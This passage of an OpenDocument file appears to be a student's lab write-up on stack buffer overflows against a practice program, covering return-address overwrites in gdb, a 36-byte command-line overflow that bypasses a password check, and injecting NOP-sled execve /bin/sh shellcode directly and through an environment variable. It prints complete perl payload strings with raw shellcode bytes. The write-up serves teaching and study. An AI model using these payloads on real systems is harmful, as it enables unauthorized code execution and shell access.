                0x080485b1 &lt;+118&gt;: 
                <text:s text:c="2"/>
                leave
              </text:span>
            </text:p>
            <text:p text:style-name="P1">
              <text:span text:style-name="T1">
                <text:s text:c="3"/>
                0x080485b2 &lt;+119&gt;: 
                <text:s text:c="2"/>
                ret
              </text:span>
            </text:p>
            <text:p text:style-name="P1">
              <text:span text:style-name="T1">End of assembler dump.</text:span>
            </text:p>
          </table:table-cell>
        </table:table-row>
      </table:table>
      <text:list text:style-name="L3">
        <text:list-item>
          <text:list>
            <text:list-item>
              <text:p text:style-name="P3">
                <text:span text:style-name="T1">The return address that is pushed on the stack when you enter </text:span>
                <text:span text:style-name="T3">check_authentication</text:span>
                <text:span text:style-name="T1">
                  <text:s/>
                  is 0x0804857b. I want this to be changed to 0x0804857f, which is only reached if the previous “je” instruction isn’t called signaling that the password didn’t match (the “test” instruction was false).
                </text:span>
              </text:p>
            </text:list-item>
          </text:list>
        </text:list-item>
      </text:list>
      <text:p text:style-name="P5">
        <text:span text:style-name="T1">[localvari] (16 bytes – stores the char bu)</text:span>
      </text:p>
      <text:p text:style-name="P5">
        <text:span text:style-name="T1">[stackfram] (4 bytes -- local frame pointer (%ebp))</text:span>
      </text:p>
      <text:p text:style-name="P5">
        <text:span text:style-name="T1">[returnadd] (4 bytes)</text:span>
      </text:p>
      <table:table table:name="Table4" table:style-name="Table1">
        <table:table-column table:style-name="TableColumn1"/>
        <table:table-row>
          <table:table-cell table:style-name="TableCell1">
            <text:p text:style-name="P1">
              <text:span text:style-name="T1">
                <text:s text:c="48"/>
                ---ebp--- 
                <text:s text:c="3"/>
                --return_addr--
              </text:span>
            </text:p>
            <text:p text:style-name="P1">
              <text:span text:style-name="T1">
                0xffffd2e0: 
                <text:s text:c="4"/>
                0x00000002 
                <text:s text:c="5"/>
                0xffffd3a4 
                <text:s text:c="5"/>
                0xffffd308 
                <text:s text:c="5"/>
                0x0804857b
              </text:span>
            </text:p>
          </table:table-cell>
        </table:table-row>
      </table:table>
      <text:list text:style-name="L3">
        <text:list-item>
          <text:list>
            <text:list-item>
              <text:p text:style-name="P3">
                <text:span text:style-name="T1">To do the change, I input the following: (gdb) set {int}0xffffd30c = 0x0804857f</text:span>
              </text:p>
            </text:list-item>
          </text:list>
        </text:list-item>
      </text:list>
      <text:p text:style-name="P8">
        <text:span text:style-name="T1"/>
      </text:p>
      <text:p text:style-name="P1">
        <text:span text:style-name="T1">Part 3:</text:span>
      </text:p>
      <text:list text:style-name="L3">
        <text:list-item>
          <text:p text:style-name="P2">
            -
            <text:span text:style-name="T1">Gain access using only the command line (without using the debugger) to overwrite return address on the stack:</text:span>
          </text:p>
          <text:list>
            <text:list-item>
              <text:p text:style-name="P3">
                <text:span text:style-name="T1">Like explained in Part 2, the </text:span>
                <text:span text:style-name="T3">character_buffer</text:span>
                <text:span text:style-name="T1">
                  <text:s/>
                  and 
                </text:span>
                <text:span text:style-name="T3">auth_flag</text:span>
                <text:span text:style-name="T1">
                  <text:s/>
                  are followed by 8 bytes, the base pointer, and the return address. Therefore, the input I enter needs to be 16+4+8+4+4 = 36 bytes large, with the address being located in those last 4 bytes, with the address input reversed due to how the data is stored.
                </text:span>
              </text:p>
            </text:list-item>
            <text:list-item>
              <text:p text:style-name="P3">
                <text:span text:style-name="T1">
                  Thus, I input ./auth_overflow3 `perl -e 'print "mypasswordhelloyothisismysecrets\x7f\x85\x04\x08"'`
                  <text:tab/>
                  into the command line and was able to gain access. I tested this to make sure I wasn’t just getting this because it was overflowing the 
                </text:span>
                <text:span text:style-name="T3">auth_flag</text:span>
                <text:span text:style-name="T1">
                  <text:s/>
                  variable by changing the address at the end of the string as well as shortening the length of the string preceding the password part and both resulted in a seg fault without access being granted, showing what I did was exactly the right length and the address was in indeed being used correctly.
                </text:span>
              </text:p>
            </text:list-item>
          </text:list>
        </text:list-item>
      </text:list>
      <text:p text:style-name="P1">
        <text:span text:style-name="T1"/>
      </text:p>
      <text:p text:style-name="P1">
        <text:span text:style-name="T1">Part 4:</text:span>
      </text:p>
      <text:list text:style-name="L1">
        <text:list-item>
          <text:p text:style-name="P2">
            -
            <text:span text:style-name="T1">Inject shellcode on the stack and execute it:</text:span>
          </text:p>
          <text:list>
            <text:list-item>
              <text:p text:style-name="P3">
                <text:span text:style-name="T1">This is similar in form to Part 3, in that I need a string with 32 random bytes, followed by the address I want to jump to, and this time adding No-Ops and the shell code to this string so that the address I jump to ends up being in this shell code (somewhere within the No-Ops).</text:span>
              </text:p>
            </text:list-item>
            <text:list-item>
              <text:p text:style-name="P3">
                <text:span text:style-name="T1">Since I just want to jump to an address somewhere within the No-Ops, I used the debugger to find an approximate address some arbitrarily large number of bytes higher in memory, which for this example can be something like 0xffffd1d0.</text:span>
              </text:p>
            </text:list-item>
            <text:list-item>
              <text:p text:style-name="P3">
                <text:span text:style-name="T1">I was able to get a shell using the string generated by perl –e ‘print “M”x32 . “\xd0\xd1\xff\xff” . “\x90”x300 . “\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80”’</text:span>
              </text:p>
              <text:list>
                <text:list-item>
                  <text:p text:style-name="P4">
                    -
                    <text:span text:style-name="T1">The shell code inserted is from </text:span>
                    <text:a xlink:type="simple" xlink:href="http://packetstormsecurity.com/files/115010/execve28-shellcode.txt">
                      <text:span text:style-name="T6">http://packetstormsecurity.com/files/115010/execve28-shellcode.txt</text:span>
                    </text:a>
                    <text:span text:style-name="T1">, which is shorter than the one given in </text:span>
                    <text:span text:style-name="T3">shellcode.c</text:span>
                    <text:span text:style-name="T1">.</text:span>
                  </text:p>
                </text:list-item>
              </text:list>
            </text:list-item>
          </text:list>
        </text:list-item>
      </text:list>
      <text:p text:style-name="P1">
        <text:span text:style-name="T1">Part 5:</text:span>
      </text:p>
      <text:list text:style-name="L1">
        <text:list-item>
          <text:p text:style-name="P2">
            -
            <text:span text:style-name="T1">Use an environment variable to inject shellcode on the stack:</text:span>
          </text:p>
          <text:list>
            <text:list-item>
              <text:p text:style-name="P3">
                <text:span text:style-name="T1">Using the /bin/tcsh shell, I was able to make the environment variable “SHELLCODE” equal to the contents of </text:span>
                <text:span text:style-name="T3">shellcode5.bin</text:span>
                <text:span text:style-name="T1">. Running the program in the debugger and using the comment “x /s $esp”, I determined that the memory address of this environment variable was 0xffffd529.</text:span>
              </text:p>
              <text:list>
                <text:list-item>
                  <text:p text:style-name="P4">
                    <text:span text:style-name="T1">To force the shellcode to execute in the debugger, I just needed to do a “set {int} 0xffffd23c = 0xffffd529” (changing value in the return address in that stack frame) and “continue” so that when the function </text:span>
                    <text:span text:style-name="T3">check_authentication</text:span>
                    <text:span text:style-name="T1">
                      <text:s/>
                      returned, it would go the code at the memory address 0xffffd529. I was then able to get a shell.
                    </text:span>
                  </text:p>
                </text:list-item>
              </text:list>
            </text:list-item>
            <text:list-item>
              <text:p text:style-name="P3">
                <text:span text:style-name="T1">Using the command line, I could get the shell by doing a similar process to what has been done above in previous parts, using perl to print 32 characters (bytes) concatenated to the approximate address I wanted plus, which was the address of the environment variable holding the shell code. I prepended No-Ops to the shell code with “setenv SHELLCODE `perl –e ‘print “\x90”x50’; cat ‘shellcode5.bin’`.</text:span>
              </text:p>
            </text:list-item>
          </text:list>
        </text:list-item>
      </text:list>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office:version="1.0">
  <office:meta>
    <meta:generator>CocoaODFWriter/1504</meta:generator>
    <meta:initial-creator>Michael Christensen</meta:initial-creator>
  </office:meta>
</office:document-meta>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office:version="1.0">
  <office:font-face-decls>
    <style:font-face style:name="Times" svg:font-family="Times"/>
  </office:font-face-decls>
  <office:styles>
    <style:default-style style:family="paragraph">
      <style:paragraph-properties style:tab-stop-distance="0.5in"/>
      <style:text-properties style:font-name="Times" fo:font-size="12.0p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office:styles>
  <office:automatic-styles>
    <style:page-layout style:name="Standard">
      <style:page-layout-properties fo:page-width="8.5in" fo:page-height="11.0in" style:print-orientation="portrait" fo:margin-top="0.5in" fo:margin-bottom="0.5in" fo:margin-left="1.0in" fo:margin-right="1.0in"/>
    </style:page-layout>
  </office:automatic-styles>
  <office:master-styles>
    <style:master-page style:name="Standard" style:page-layout-name="Standard"/>
  </office:master-styles>
</office:document-styles>
</file>